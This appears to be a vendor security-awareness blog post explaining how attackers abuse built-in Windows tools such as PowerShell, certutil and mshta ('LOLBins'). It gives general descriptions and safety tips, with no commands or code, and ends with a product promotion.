LOLBins: No Laughing Matter!

LOLBins: No Laughing Matter!

Windows comes packed with many useful tools, but attackers can weaponize some of these same tools. These are called LOLBins (Living Off The Land Binaries); understanding them and how they work is essential for Windows security.

What are Windows LOLBins?

LOLBins are no laughing matter! They are legitimate built-in Windows programs, that attackers abuse for malicious purposes. They aren’t malware themselves, but they are tools that can be used to carry out malicious activities.

Common Windows LOLBins and What Attackers Do With Them

PowerShell: A powerful scripting language. Attackers use it to download and execute malicious code, bypass security restrictions, and automate attacks. Think of it as a super-powered command prompt that can be used for good or evil.

certutil: A command-line tool for managing certificates. Attackers use it to download malicious files disguised as certificates. It can also be used to encode and decode data, making it useful for hiding malware.

bitsadmin: A tool for managing background file transfers. Attackers use it to download malware, often making it appear as a legitimate Windows update or download.

wmic (Windows Management Instrumentation Command-line): Provides an interface for accessing and managing Windows systems. Attackers use it to gather system information, execute commands, and even move laterally within a network.

regsvr32: A tool for registering and unregistering DLLs (Dynamic Link Libraries). Attackers abuse it to execute malicious code hidden within DLL files.

rundll32: Similar to regsvr32, used to run functions from DLLs. Attackers use it to execute malicious code.

mshta (Microsoft HTML Application Host): Can execute HTML and scripting code. Attackers use it to run malicious scripts, sometimes bypassing application whitelisting.

Why are Windows LOLBins becoming such a Problem?

Windows LOLBins are everywhere. They are present on every Windows system, giving attackers many options. Because they’re legitimate, their activity can be hard to distinguish from normal system operations making them difficult to detect.

Some security software might overlook activity from LOLbins because they use trusted tools, even if that activity is malicious.

What Can You Do to Keep Safe?

Always keep Windows updated. Patching vulnerabilities in Windows reduces the chances of attackers exploiting LOLBins.

Don’t run PowerShell scripts, other scripts, or command-line commands from untrusted sources.

Always use a good security solution to detect malicious use of LOLBins by analyzing the context of their activity. Emsisoft protects you from LOLBins.

Remember: Attackers can use Windows’ built-in tools against you. By understanding how they do this, you can take steps to protect yourself. Staying informed and practicing good security habits are essential. If you already use Emsisoft you’re protected. If you don’t, do your homework to find out if your current antivirus software protects you from LOLBins. 

LOLBins are no laughing matter!